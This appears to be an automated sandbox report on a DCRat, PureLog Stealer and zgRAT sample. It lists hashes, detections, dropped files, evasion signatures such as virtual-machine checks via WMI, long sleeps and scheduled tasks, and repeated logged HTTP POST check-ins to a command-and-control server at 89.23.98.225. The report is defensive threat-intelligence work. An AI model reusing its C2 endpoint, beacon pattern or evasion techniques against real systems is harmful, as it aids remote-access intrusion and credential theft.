Windows Analysis Report
ZT3pxe2Tb4.exe

Overview

General Information

Sample name: ZT3pxe2Tb4.exe
renamed because original name is a hash value
Original sample name: 4164D5955C244FF266C1CC41013FE21A.exe
Analysis ID: 1417387
MD5: 4164d5955c244ff266c1cc41013fe21a
SHA1: cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
SHA256: 138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
Tags: DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: ZT3pxe2Tb4.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\Desktop\DACRVJoK.log Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\Desktop\CgRzmzKC.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\ELDRalsN.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\CGTrJaEm.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\AFOsBjYP.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat Avira: detection malicious, Label: BAT/Runner.IK
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\Desktop\AFOsBjYP.log Virustotal: Detection: 19% Perma Link
Source: C:\Users\user\Desktop\AaPSReOe.log Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\Desktop\CGTrJaEm.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\CGTrJaEm.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\COTaDrJc.log Virustotal: Detection: 21% Perma Link
Source: C:\Users\user\Desktop\CTQIQVae.log Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\Desktop\CgRzmzKC.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\CgRzmzKC.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\CkrRJHNx.log Virustotal: Detection: 8% Perma Link
Source: C:\Users\user\Desktop\DACRVJoK.log Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\Desktop\FWXhQVXq.log Virustotal: Detection: 19% Perma Link
Source: C:\Users\user\Desktop\FWzHsBqG.log Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: ZT3pxe2Tb4.exe ReversingLabs: Detection: 86%
Source: ZT3pxe2Tb4.exe Virustotal: Detection: 73% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\CTQIQVae.log Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CkrRJHNx.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AaPSReOe.log Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ZT3pxe2Tb4.exe Joe Sandbox ML: detected

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
Uses 32bit PE files
Source: ZT3pxe2Tb4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: ZT3pxe2Tb4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FFD9BBCD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 8_2_00007FFD9BBAD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA21F76h 9_2_00007FFD9BA21D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 14_2_00007FFD9BBDD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA01F76h 21_2_00007FFD9BA01D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 21_2_00007FFD9BBAD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 27_2_00007FFD9BBBD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 34_2_00007FFD9BB9D16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA21F76h 35_2_00007FFD9BA21D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 35_2_00007FFD9BBCD16D

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49731 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49740 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49749 -> 89.23.98.225:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MAXITEL-ASRU MAXITEL-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:10 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
